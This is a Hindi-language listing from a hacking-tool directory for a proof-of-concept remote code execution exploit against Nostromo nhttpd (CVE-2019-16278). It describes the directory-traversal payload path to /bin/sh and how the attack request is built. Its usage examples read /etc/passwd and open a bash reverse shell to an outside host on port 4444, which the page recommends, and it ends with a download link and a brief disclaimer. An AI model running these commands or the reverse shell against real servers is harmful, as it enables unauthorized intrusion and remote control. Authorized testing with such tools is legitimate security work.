Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-16278 — Nostromo nhttpd ≤ 1.9.6 के लिए PoC RCE एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/andknownmaly/cve-2019-16278
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubandknownmaly/cve-2019-16278

CVE-2019-16278

Nostromo nhttpd ≤ 1.9.6 के लिए PoC RCE एक्सप्लॉइट

रिपॉजिटरी देखें
38 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-16278 - Nostromo nhttpd RCE

भेद्यता विवरण

Nostromo nhttpd संस्करण <= 1.9.6 में HTTP अनुरोध प्रबंधन में डायरेक्ट्री ट्रैवर्सल के माध्यम से रिमोट कोड एक्ज़ीक्यूशन (Remote Code Execution) भेद्यता।

प्रभावित संस्करण

  • Nostromo nhttpd 1.9.6 और उससे पहले के संस्करण

एक्सप्लॉइट विवरण

यह एक्सप्लॉइट URL-एन्कोडेड CRLF वर्णों (%0d) का उपयोग करके एक डायरेक्ट्री ट्रैवर्सल भेद्यता का लाभ उठाता है, जिससे /bin/sh तक पहुँचकर मनमाने कमांड निष्पादित किए जा सकते हैं।

यह कैसे काम करता है:

  1. पाथ ट्रैवर्सल के साथ POST अनुरोध भेजता है: /.%0d./.%0d./.%0d./.%0d./bin/sh
  2. पेलोड आकार नियंत्रित करने के लिए Content-Length हेडर का उपयोग करता है
  3. शेल रीडायरेक्शन के माध्यम से कमांड निष्पादित करता है: echo\necho\n<command> 2>&1

उपयोग

root@kitploit:~
python3 cve-2019-16278.py <TARGET_IP> <PORT> <COMMAND>

उदाहरण:

root@kitploit:~
python3 cve-2019-16278.py 192.168.1.100 80 "id"
python3 cve-2019-16278.py 10.10.10.10 8080 "cat /etc/passwd"
python3 cve-2019-16278.py target.com 80 "whoami"
python3 cve-2019-16278.py 10.10.10.10 80 "bash -c 'bash -i >& /dev/tcp/10.10.20.20/4444 0>&1'"

रिवर्स शेल अनुशंसित है, कभी-कभी यह स्क्रिप्ट कुछ भी नहीं दिखाती

आवश्यकताएँ

  • Python 3
  • लक्ष्य सर्वर तक नेटवर्क पहुँच
  • लक्ष्य पर संवेदनशील (vulnerable) Nostromo nhttpd चल रहा हो

संदर्भ

  • CVE: CVE-2019-16278
  • https://www.exploit-db.com/exploits/47837
  • https://nvd.nist.gov/vuln/detail/CVE-2019-16278

अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।

टूल डाउनलोड करें